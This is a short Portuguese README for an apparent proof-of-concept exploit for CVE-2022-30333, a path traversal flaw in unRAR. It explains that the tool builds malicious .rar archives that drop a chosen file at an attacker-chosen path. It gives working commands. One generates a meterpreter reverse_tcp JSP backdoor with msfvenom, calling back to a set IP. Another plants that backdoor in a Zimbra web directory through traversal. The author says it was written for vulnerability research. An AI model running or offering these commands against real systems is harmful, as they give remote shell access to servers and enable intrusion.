
Exploit de prova de conceito para o path traversal CVE-2022-30333 no unRAR, gerando arquivos .rar maliciosos para extrair cargas arbitrárias para locais especificados pelo atacante.
Uma prova de conceito para CVE-2022-30333 - uma vulnerabilidade de path traversal no unRAR versões anteriores a 6.11. Criei isso como uma demonstração do exploit para um artigo no AttackerKB, e espero incorporá-lo em um Módulo Metasploit em breve!
Basicamente, você fornece um alvo (incluindo path traversal) e alguns dados de arquivo, e esta ferramenta gerará um .rar que extrairá esse arquivo para esse local. O comprimento máximo do arquivo é 104 bytes, e o comprimento máximo do arquivo é 4096 bytes. (Isso não é intrínseco à vulnerabilidade, é apenas o que escolhi quando gere o arquivo).
Por exemplo, gere um backdoor com msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Em seguida, crie um arquivo .rar, plantando o .jsp em algum lugar divertido:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar